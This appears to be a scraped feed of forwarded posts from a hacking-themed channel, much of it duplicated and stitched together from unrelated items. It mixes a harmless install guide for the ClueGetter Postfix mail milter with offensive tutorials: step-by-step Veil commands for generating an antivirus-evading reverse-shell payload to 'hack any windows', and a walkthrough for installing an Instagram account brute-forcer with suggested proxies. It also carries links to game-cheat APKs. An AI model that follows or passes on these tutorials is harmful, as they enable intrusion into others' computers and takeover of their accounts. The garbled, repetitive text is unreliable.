Forwarded from UNDERCODE NEWS
Countermeasures are behind "Online skimming" to steal card information without a trace.
#CyberAttacks
#CyberAttacks
β β β Uππ»βΊπ«Δπ¬πβ β β β
Still looking for more ?
Quotas - Limit the number of emails (per ip, sasl user, recipient, sender) over an arbitrary amount of time.
SpamAssassin - Determine whether an email is SPAM through
SpamAssassin. Can be used alongside the Rspamd module.
Rspamd - Determine whether an email is SPAM through Rspamd. Can be used alongside the SpamAssassin module.
ClamAV/Clamd - Scan the message for viruses, malware, etc.
Greylisting - Ask a server to try again in a bit if it wasn't seen before and the mail looks spammy.
Bounce Handling - Keep track of what emails were rejected by remote MTAs and for what reasons.
|Abusers - Present a list of users in the web interface who had an unusual amount of email rejected. Usually these users have been hacked, or are otherwise malicious.
MailQueue - Display an aggregate of all mail queues that reside in your ClueGetter cluster. Filter based on instance, recipient(/domain), sender(/domain) and delete or requeue selections of items in the queue.
Contacts - Import address books (e.g. from RoundCube) so these addresses and/or domains can be used to (partially) blacklist messages from those addresses or domains.
SRS - Sender Rewriting Scheme
DKIM - Sign messages using DKIM
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) download or clone :
https://github.com/Freeaqingme/ClueGetter
2) Copy the example config file: cp cluegetter.conf.dist cluegetter.conf
3) Add the following directives to Postfix' main.cf:
smtpd_milters = inet:localhost:10033
enable_long_queue_ids = yes
4) The long queue id's are necessary because ClueGetter uses these id's as internal reference and as such they are required to be unique (which the enable_long_queue_ids directive ensures).
If you want to test ClueGetter first to see how it would behave, without actually influencing current operations, run it in noop mode.
5) Change the noop directive in the cluegetter config file:
noop = true
Add to the Postfix main.cf:
milter_default_action=accept
6) Create and fill the database:
echo 'CREATE DATABASE cluegetter DEFAULT CHARACTER SET utf8' | mysql
mysql cluegetter < mysql.sql
Run ClueGetter:
7) make
./bin/cluegetter --config ./cluegetter.conf --loglevel=DEBUG daemon --foreground
Once you got things up and running, consider setting up Redis. This will significantly improve performance and the ability to handle email while under load.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Still looking for more ?
Quotas - Limit the number of emails (per ip, sasl user, recipient, sender) over an arbitrary amount of time.
SpamAssassin - Determine whether an email is SPAM through
SpamAssassin. Can be used alongside the Rspamd module.
Rspamd - Determine whether an email is SPAM through Rspamd. Can be used alongside the SpamAssassin module.
ClamAV/Clamd - Scan the message for viruses, malware, etc.
Greylisting - Ask a server to try again in a bit if it wasn't seen before and the mail looks spammy.
Bounce Handling - Keep track of what emails were rejected by remote MTAs and for what reasons.
|Abusers - Present a list of users in the web interface who had an unusual amount of email rejected. Usually these users have been hacked, or are otherwise malicious.
MailQueue - Display an aggregate of all mail queues that reside in your ClueGetter cluster. Filter based on instance, recipient(/domain), sender(/domain) and delete or requeue selections of items in the queue.
Contacts - Import address books (e.g. from RoundCube) so these addresses and/or domains can be used to (partially) blacklist messages from those addresses or domains.
SRS - Sender Rewriting Scheme
DKIM - Sign messages using DKIM
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) download or clone :
https://github.com/Freeaqingme/ClueGetter
2) Copy the example config file: cp cluegetter.conf.dist cluegetter.conf
3) Add the following directives to Postfix' main.cf:
smtpd_milters = inet:localhost:10033
enable_long_queue_ids = yes
4) The long queue id's are necessary because ClueGetter uses these id's as internal reference and as such they are required to be unique (which the enable_long_queue_ids directive ensures).
If you want to test ClueGetter first to see how it would behave, without actually influencing current operations, run it in noop mode.
5) Change the noop directive in the cluegetter config file:
noop = true
Add to the Postfix main.cf:
milter_default_action=accept
6) Create and fill the database:
echo 'CREATE DATABASE cluegetter DEFAULT CHARACTER SET utf8' | mysql
mysql cluegetter < mysql.sql
Run ClueGetter:
7) make
./bin/cluegetter --config ./cluegetter.conf --loglevel=DEBUG daemon --foreground
Once you got things up and running, consider setting up Redis. This will significantly improve performance and the ability to handle email while under load.
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - Freeaqingme/ClueGetter: Access and Auditing Milter for Postfix
Access and Auditing Milter for Postfix. Contribute to Freeaqingme/ClueGetter development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack any windows from any linux :
1) Veil can be installed by following command :-
Open Terminal and go inside opt directory (which is meant for installing optional packages) by running following command.
cd /opt/
2) Now, run this command to install Veil and all its related dependencies. You can also check out their github for more info.
git clone https://github.com/Veil-Framework/Veil.git
3) cd Veil/config/
Note :- If you are not root use sudo like shown below else if youβre root, remove sudo from below command.
4) sudo ./setup.sh βforce βsilent
It will take sometime depending upon internet speed. It will install as well as its dependencies like Wine and other gcc Mingw packages.
5) Once its done installing and everything is completed, close the terminal and open a new one or you can continue within the same terminal too. Now navigate to Veil directory by running following command :-
cd /opt/Veil/
6) Now to run Veil run the following command
Note :- If you are not root use sudo like shown below else if youβre root, remove sudo from below command.
sudo ./Veil.py
7) If you get something like shown below congratulations you are ready to move to the next section of this post and definitely you are going to hack windows.
To use this payload type following command :- use 15 and hit enter.
8) Now set the following options for generating the payload
set LHOST Your_IP_Address
9) set LPORT 8080
10) Now to bypass all anitivirus we will set some optional parameters too
set PROCESSORS 1
set SLEEP 6
11) hack veil values
12) Now we will generate our payload by running this command:-
generate
13) Then it will ask you to give some name to the file. You can name it anything you want. I named it to rev_https_8080.
hack generated
14) If you get output something like shown below, congratulations your payload is generated.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack any windows from any linux :
1) Veil can be installed by following command :-
Open Terminal and go inside opt directory (which is meant for installing optional packages) by running following command.
cd /opt/
2) Now, run this command to install Veil and all its related dependencies. You can also check out their github for more info.
git clone https://github.com/Veil-Framework/Veil.git
3) cd Veil/config/
Note :- If you are not root use sudo like shown below else if youβre root, remove sudo from below command.
4) sudo ./setup.sh βforce βsilent
It will take sometime depending upon internet speed. It will install as well as its dependencies like Wine and other gcc Mingw packages.
5) Once its done installing and everything is completed, close the terminal and open a new one or you can continue within the same terminal too. Now navigate to Veil directory by running following command :-
cd /opt/Veil/
6) Now to run Veil run the following command
Note :- If you are not root use sudo like shown below else if youβre root, remove sudo from below command.
sudo ./Veil.py
7) If you get something like shown below congratulations you are ready to move to the next section of this post and definitely you are going to hack windows.
To use this payload type following command :- use 15 and hit enter.
8) Now set the following options for generating the payload
set LHOST Your_IP_Address
9) set LPORT 8080
10) Now to bypass all anitivirus we will set some optional parameters too
set PROCESSORS 1
set SLEEP 6
11) hack veil values
12) Now we will generate our payload by running this command:-
generate
13) Then it will ask you to give some name to the file. You can name it anything you want. I named it to rev_https_8080.
hack generated
14) If you get output something like shown below, congratulations your payload is generated.
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - Veil-Framework/Veil: Veil 3.1.X (Check version info in Veil at runtime)
Veil 3.1.X (Check version info in Veil at runtime) - Veil-Framework/Veil
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦INSTA BRUTE UPDATED THIS MONTH :
Suggested to use proxies from https://pastebin.com/PU95YtCQ
open terminal
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/evildevill/instahack
$ ls
$ cd instahack
$ ls
$ bash setup
$ bash instahack.sh
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦INSTA BRUTE UPDATED THIS MONTH :
Suggested to use proxies from https://pastebin.com/PU95YtCQ
open terminal
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/evildevill/instahack
$ ls
$ cd instahack
$ ls
$ bash setup
$ bash instahack.sh
β β β Uππ»βΊπ«Δπ¬πβ β β β
Pastebin
DETAILED PROXIES LIST - Pastebin.com
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
Forwarded from UNDERCODE NEWS
An Anonymous Turkish hackers group crashed the ECHR website asking for DemirtaΕ's release.
#CyberAttacks
#CyberAttacks
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK YOUR ANDROID GAMES :
https://xmodgames.download/
https://hackerbot.net/software/444-hackerbot-download
https://www.cheatengine.org/downloads.php
https://sbgamehacker.download/apk/
https://creehack.net/
https://gameguardian.net/download
https://gamecihworld.puzl.com/
https://www.luckypatchers.com/lucky-patcher-6-0-7-apk/
http://leoplaycard.info/
https://gamekiller.co/
https://latestmodapks.com/download-freedom-apk-latest/
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK YOUR ANDROID GAMES :
https://xmodgames.download/
https://hackerbot.net/software/444-hackerbot-download
https://www.cheatengine.org/downloads.php
https://sbgamehacker.download/apk/
https://creehack.net/
https://gameguardian.net/download
https://gamecihworld.puzl.com/
https://www.luckypatchers.com/lucky-patcher-6-0-7-apk/
http://leoplaycard.info/
https://gamekiller.co/
https://latestmodapks.com/download-freedom-apk-latest/
β β β Uππ»βΊπ«Δπ¬πβ β β β
Techylist
Xmodgames - Download Xmod Apk For Android (Official)
People have been playing games like Clash of Clans, Minecraft, Clash Royale, Asphalt 8, Mortal Combat, etc. for such a long time that, most of them become dull. This is probably because the game is small or it is very hard after a certain level. So in suchβ¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS